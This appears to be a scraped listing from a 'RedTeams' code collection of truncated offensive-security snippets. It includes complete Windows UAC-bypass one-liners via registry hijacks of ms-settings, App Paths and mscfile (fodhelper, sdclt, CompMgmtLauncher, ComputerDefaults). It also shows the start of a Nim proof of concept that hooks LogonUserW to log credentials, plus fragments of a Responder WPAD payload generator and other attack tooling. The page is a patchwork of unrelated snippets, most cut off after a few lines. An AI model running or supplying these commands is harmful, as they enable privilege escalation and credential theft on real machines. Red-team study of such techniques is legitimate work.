RedTeams

#!/usr/bin/env python

import argparse
import http.server
import os

class HTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
    def do_PUT(self):
        path = self.translate_path(self.path)
        if path.endswith('/'):

RedTeams

Usage

This script generates a payload for use with Responder.

1. Generate a payload with main.py
2. Copy and paste the one-liner output into the WPADScript field of Responder.conf.

test@test:~$ python3 main.py --help
usage: main.py [-h] [-o OUT] cmd

RedTeams

using System;
using System.IO;
using System.Text;
using System.IO.Compression;
using System.EnterpriseServices;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
 
/*

RedTeams

Proxied Execution using ComputerDefaults.exe using ms-settings Registry Hijacking

Step 1: Create or modify the registry key

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /ve /d "C:\Windows\System32\cmd.exe /c C:\Windows\System32\calc.exe" /f

reg.exe add HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\open\command /v "DelegateExecute" /t REG_SZ /d "" /f

Step 2: Execute ComputerDefaults.exe

This will trigger the execution of calc.exe

C:\Windows\System32\ComputerDefaults.exe

RedTeams

**UAC bypass for Win10:**
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

**UAC bypass for Win10:**
reg add HKCU\Software\Classes\ms-settings\shell\open\command /v "DelegateExecute" /f && reg add HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd /c start powershell.exe" /f && START /W fodhelper.exe && reg delete HKCU\Software\Classes\ms-settings /f

**UAC bypass for 7/8/10:**
reg add HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command /d "cmd.exe" /f && START /W CompMgmtLauncher.exe && reg delete HKEY_CURRENT_USER\Software\Classes\mscfile /f

RedTeams

if (-not ('TokenInformation.ProcessNativeMethods' -as [type])){
    $TypeDef = @'
 using System;
 using System.Runtime.InteropServices;
 namespace TokenInformation {
     [Flags]
     public enum ProcessAccess {
         All = 0x001FFFFF,
         Terminate = 0x00000001,

RedTeams

using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass

RedTeams

#[

    PoC for hooking advapi32!LogonUserW to log credentials
    Patch and restore the function when called, original credit for 99% of the code is here: https://github.com/byt3bl33d3r/OffensiveNim/blob/master/src/Hook.nim
    Log to a named pipe server (must be started/managed by separate listener), and/or log to a file
    by default, just logs to C:\users\public\log.txt

    Compile: 
        nim c -d=mingw --app=lib -d:release --nomain LogonUserSpy.nim

RedTeams

{
  "84kr3q1592995213323": {
    "type": 1,
    "color": "#cc883a",
    "title": "Burp",
    "active": true,
    "address": "127.0.0.1",
    "port": 8080,
    "proxyDNS": false,
    "username": "",

RedTeams

{
    "proxy":{
        "ssl_pass_through":{
            "automatically_add_entries_on_client_ssl_negotiation_failure":false,
            "rules":[
                {
                    "enabled":true,
                    "host":".*\\.google\\.com",
                    "protocol":"any"
                },